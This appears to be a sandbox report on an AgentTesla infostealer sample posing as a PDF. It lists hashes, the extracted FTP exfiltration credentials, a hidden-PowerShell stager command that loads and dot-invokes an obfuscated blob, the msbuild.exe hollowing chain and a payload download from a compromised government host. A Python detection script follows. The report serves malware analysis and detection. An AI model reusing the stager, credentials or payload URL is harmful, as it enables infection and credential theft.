Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09/12/2023, 01:11 UTC

General

  • Target

    Sutarčių analizė-pdf.exe

  • Size

    711KB

  • MD5

    102714cb47ab0624d79ed174a8231ad6

  • SHA1

    8991d7808c89d2c6209322b20ea4a8b75f78fb44

  • SHA256

    0da1ad1d456b5b7a028efcbfd9c3ee45af7c6830c87c1e7469faa089dbb0fe7e

  • SHA512

    7467ec91c266be688bf97f92a72068bf3271b1c58bf7ded76fce89fa93a8c06d631727b68c4938df57dbab3f0a07a0f6820f3587e87155a77e9d424e288b9bf2

  • SSDEEP

    12288:twFGHEOFmZPT0TRoi+kXjhk5na5hylgimtdYM3O0V7bbnL:t5HEOOPOaMd4na2lgZtub0V7z

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    bringlogsformoney@vvspijkenisse.nl
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a .NET-based remote access tool (RAT) and information stealer, originally written in Visual Basic .NET. It harvests credentials from browsers, mail and FTP clients and exfiltrates them over SMTP, FTP or HTTP; the configuration extracted from this sample (see Credentials above) uses FTP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Preciosity=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru';$Besvorne=$Preciosity.SubString(54587,3);.$Besvorne($Preciosity)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 1864
          4⤵
          • Program crash
          PID:3500
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1528 -ip 1528
    1⤵
      PID:372
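
    The command line on PID 2428 is the interesting part of this chain: a dropper running from %TEMP% launches hidden PowerShell, which reads the 53KB blob Profanenesses.Gru with Get-Content, takes the 3 characters at offset 54587 as a command name and dot-invokes it with the whole blob as its argument. msbuild.exe then appears with no build arguments (the SetThreadContext, MapViewOfSection and WriteProcessMemory signatures on the PowerShell process point at process hollowing), and WerFault reports PID 1528 crashing. The Python below is an added example, not part of the Tria.ge report: it encodes those observations as checks over process-creation events constructed from the tree above, and emulates the SubString trick against a constructed blob. The event field names, the extra .NET host names beyond msbuild.exe, and the "iex" placed at the offset are assumptions; the real three characters in this sample's blob are not shown on this page.

```python
"""Detection logic for the loader chain in this report (added example, not sandbox
output).  EVENTS is constructed from the Processes section; the field names loosely
follow Sysmon Event ID 1 and are an assumption."""
import re

# Constructed from the report's process tree: PID, parent PID, image, command line.
EVENTS = [
    {"pid": 1464, "ppid": 0,
     "image": r"C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Sutarčių analizė-pdf.exe"'},
    {"pid": 2428, "ppid": 1464,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"powershell.exe" -windowstyle hidden "$Preciosity=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Spdlammene\cirka\Buzzardlike\Mavepinerne\Profanenesses.Gru';$Besvorne=$Preciosity.SubString(54587,3);.$Besvorne($Preciosity)"'''},
    {"pid": 1528, "ppid": 2428,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"'},
    {"pid": 3500, "ppid": 1528,
     "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 1864"},
]

# Read a blob, slice a short string out of it, dot-invoke that string: the characters at
# the offset are the name of the command that receives the whole blob as its argument.
STAGER_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'.*?"
    r"\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\).*?"
    r"\.\$(?P<var>\w+)\(",
    re.IGNORECASE | re.DOTALL)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# .NET binaries commonly abused as hollowing hosts.  msbuild.exe is the one in this
# report; the others are added for generality (assumption, not from the report).
HOLLOW_HOSTS = ("msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe",
                "aspnet_compiler.exe", "applaunch.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def args_of(cmdline):
    """Everything after the (possibly quoted) program token."""
    c = cmdline.strip()
    if c.startswith('"'):
        end = c.find('"', 1)
        return c[end + 1:].strip() if end != -1 else ""
    return c.split(" ", 1)[1].strip() if " " in c else ""


def parse_stager(cmdline):
    """(blob_path, offset, length, variable) for the SubString stager pattern, else None."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return m["path"], int(m["off"]), int(m["len"]), m["var"]


def emulate_stager(blob, offset, length):
    """What `$v=$blob.SubString(offset,length); .$v($blob)` resolves to: the command name.
    Get-Content on a file with no line breaks returns one string, so the slice works."""
    if offset + length > len(blob):
        raise ValueError("offset past end of blob")
    return blob[offset:offset + length]


# Constructed stand-in for Profanenesses.Gru.  The real blob is not on the page and the
# "iex" (Invoke-Expression alias) at the offset is an assumption, not a recovered value.
CONSTRUCTED_BLOB = "A" * 54587 + "iex" + "B" * 64


def analyze(events):
    """Map PID -> finding tags for the chain: user-writable parent -> hidden PowerShell
    with a SubString stager -> argument-less .NET host -> WerFault crash of that host."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}

    def flag(pid, tag):
        findings.setdefault(pid, []).append(tag)

    for e in events:
        img, args = basename(e["image"]), args_of(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        if img in ("powershell.exe", "pwsh.exe"):
            if HIDDEN_RE.search(args):
                flag(e["pid"], "powershell-hidden-window")
            st = parse_stager(args)
            if st:
                flag(e["pid"], f"powershell-substring-stager:{st[1]}:{st[2]}")
            if parent and any(d in parent["image"].lower() for d in USER_WRITABLE):
                flag(e["pid"], "powershell-from-user-writable-parent")
        elif img in HOLLOW_HOSTS and not args:
            # A build tool launched with nothing to build is a hollowing host, not a build.
            flag(e["pid"], "dotnet-host-no-args")
            if pimg in ("powershell.exe", "pwsh.exe"):
                flag(e["pid"], "dotnet-host-spawned-by-powershell")
    # Second pass: WerFault reporting on a flagged process means the injected payload died.
    for e in events:
        if basename(e["image"]) == "werfault.exe":
            m = re.search(r"-p\s+(\d+)", args_of(e["cmdline"]))
            if m and int(m[1]) in findings:
                flag(e["pid"], f"crash-of-flagged-process:{m[1]}")
    return findings


if __name__ == "__main__":
    for pid, tags in analyze(EVENTS).items():
        print(pid, tags)
    print(emulate_stager(CONSTRUCTED_BLOB, 54587, 3))
```

    The dropper itself (PID 1464) produces no finding on its own; the chain becomes suspicious at the PowerShell child, which is where a process-creation rule should fire. The crash check is worth keeping: a WerFault on an argument-less msbuild.exe is the reason this run shows no FTP traffic, so a detonation that ends this way should not be read as "no C2".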

    Network

    • [US]
      DNS
      107.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      107.175.53.84.in-addr.arpa
      IN PTR
      Response
      107.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-107.deploy.static.akamaitechnologies.com
    • [US]
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      59.128.231.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      59.128.231.4.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      241.154.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.154.82.20.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      39.142.81.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      39.142.81.104.in-addr.arpa
      IN PTR
      Response
      39.142.81.104.in-addr.arpa
      IN PTR
      a104-81-142-39.deploy.static.akamaitechnologies.com
    • [US]
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.a-0001.a-msedge.net
      g-bing-com.a-0001.a-msedge.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • [US]
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2CBD29E2C7EC65D80B843A00C646643D; domain=.bing.com; expires=Thu, 02-Jan-2025 01:11:31 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 81E44C06FED242F7B98C6995B843EC43 Ref B: DUS30EDGE0813 Ref C: 2023-12-09T01:11:31Z
      date: Sat, 09 Dec 2023 01:11:31 GMT
    • [US]
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2CBD29E2C7EC65D80B843A00C646643D
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 1EEFBBFA81CB44738CFC44D90F823A5C Ref B: DUS30EDGE0813 Ref C: 2023-12-09T01:11:31Z
      date: Sat, 09 Dec 2023 01:11:31 GMT
    • [US]
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2CBD29E2C7EC65D80B843A00C646643D
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 7ACC088C2BBD406EA460C5FA6734AD66 Ref B: DUS30EDGE0813 Ref C: 2023-12-09T01:11:31Z
      date: Sat, 09 Dec 2023 01:11:31 GMT
    • [US]
      DNS
      9.228.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.228.82.20.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      200.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.197.79.204.in-addr.arpa
      IN PTR
      Response
      200.197.79.204.in-addr.arpa
      IN PTR
      a-0001.a-msedge.net
    • [US]
      DNS
      43.58.199.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      43.58.199.20.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • [US]
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 341424
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0E7D56DE724045F5B293C11501536FE6 Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • [US]
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&w=1080&h=1920&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 350318
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: CF410B85C9314B24A7DAFA78AD855DB9 Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • [US]
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317300987_1J0P1F40FB09II9DT&pid=21.2&w=1920&h=1080&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317300987_1J0P1F40FB09II9DT&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 427323
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 60AB4F6AE0584DD49C593244DBABB90C Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • [US]
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 373081
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0C8007C83AB64029B2C47401B8EEC592 Ref B: DUS30EDGE0921 Ref C: 2023-12-09T01:11:36Z
      date: Sat, 09 Dec 2023 01:11:35 GMT
    • [US]
      DNS
      158.240.127.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      158.240.127.40.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      121.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.175.53.84.in-addr.arpa
      IN PTR
      Response
      121.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-121.deploy.static.akamaitechnologies.com
    • [US]
      DNS
      spsc.sudurpashchim.gov.np
      msbuild.exe
      Remote address:
      8.8.8.8:53
      Request
      spsc.sudurpashchim.gov.np
      IN A
      Response
      spsc.sudurpashchim.gov.np
      IN A
      202.45.144.24
    • [NP]
      GET
      http://spsc.sudurpashchim.gov.np/geo.bin
      msbuild.exe
      Remote address:
      202.45.144.24:80
      Request
      GET /geo.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
      Host: spsc.sudurpashchim.gov.np
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sat, 09 Dec 2023 01:12:24 GMT
      Server: Apache
      Last-Modified: Fri, 08 Dec 2023 05:27:55 GMT
      Accept-Ranges: bytes
      Content-Length: 239168
      Content-Type: application/octet-stream
    • [US]
      DNS
      24.144.45.202.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.144.45.202.in-addr.arpa
      IN PTR
      Response
      24.144.45.202.in-addr.arpa
      IN PTR
      webcpanel2.nitc.gov.np
    • [US]
      DNS
      24.144.45.202.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.144.45.202.in-addr.arpa
      IN PTR
      Response
      24.144.45.202.in-addr.arpa
      IN PTR
      webcpanel2.nitc.gov.np
    • [US]
      DNS
      122.175.53.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      122.175.53.84.in-addr.arpa
      IN PTR
      Response
      122.175.53.84.in-addr.arpa
      IN PTR
      a84-53-175-122.deploy.static.akamaitechnologies.com
    • [US]
      DNS
      48.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      48.229.111.52.in-addr.arpa
      IN PTR
      Response
    • [US]
      DNS
      136.71.105.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      136.71.105.51.in-addr.arpa
      IN PTR
      Response
    • 204.79.197.200:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=
      tls, http2
      1.9kB
      9.3kB
      22
      18

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=037b3e7bf6f5441aa15a1d943bc98fd8&localId=w:B05FFB08-BB46-C045-BDE6-41F07446A3F0&deviceId=6966553493663940&anid=

      HTTP Response

      204
    • 204.79.197.200:443
      https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4
      tls, http2
      57.0kB
      1.6MB
      1134
      1128

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317301420_1D6NOV5C8JU3EW64U&pid=21.2&w=1080&h=1920&c=4

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&w=1080&h=1920&c=4

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317300987_1J0P1F40FB09II9DT&pid=21.2&w=1920&h=1080&c=4

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&w=1920&h=1080&c=4

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      8.3kB
      16
      14
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      8.3kB
      16
      14
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      8.3kB
      16
      14
    • 202.45.144.24:80
      http://spsc.sudurpashchim.gov.np/geo.bin
      http
      msbuild.exe
      8.5kB
      246.6kB
      182
      180

      HTTP Request

      GET http://spsc.sudurpashchim.gov.np/geo.bin

      HTTP Response

      200
    • 52.111.227.14:443
      322 B
      7
    • 8.8.8.8:53
      107.175.53.84.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      107.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      59.128.231.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      59.128.231.4.in-addr.arpa

    • 8.8.8.8:53
      241.154.82.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      241.154.82.20.in-addr.arpa

    • 8.8.8.8:53
      39.142.81.104.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      39.142.81.104.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      158 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      9.228.82.20.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      9.228.82.20.in-addr.arpa

    • 8.8.8.8:53
      200.197.79.204.in-addr.arpa
      dns
      73 B
      106 B
      1
      1

      DNS Request

      200.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      43.58.199.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      43.58.199.20.in-addr.arpa

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
      173 B
      1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      158.240.127.40.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      158.240.127.40.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      121.175.53.84.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      121.175.53.84.in-addr.arpa

    • 8.8.8.8:53
      spsc.sudurpashchim.gov.np
      dns
      msbuild.exe
      71 B
      87 B
      1
      1

      DNS Request

      spsc.sudurpashchim.gov.np

      DNS Response

      202.45.144.24

    • 8.8.8.8:53
      24.144.45.202.in-addr.arpa
      dns
      144 B
      216 B
      2
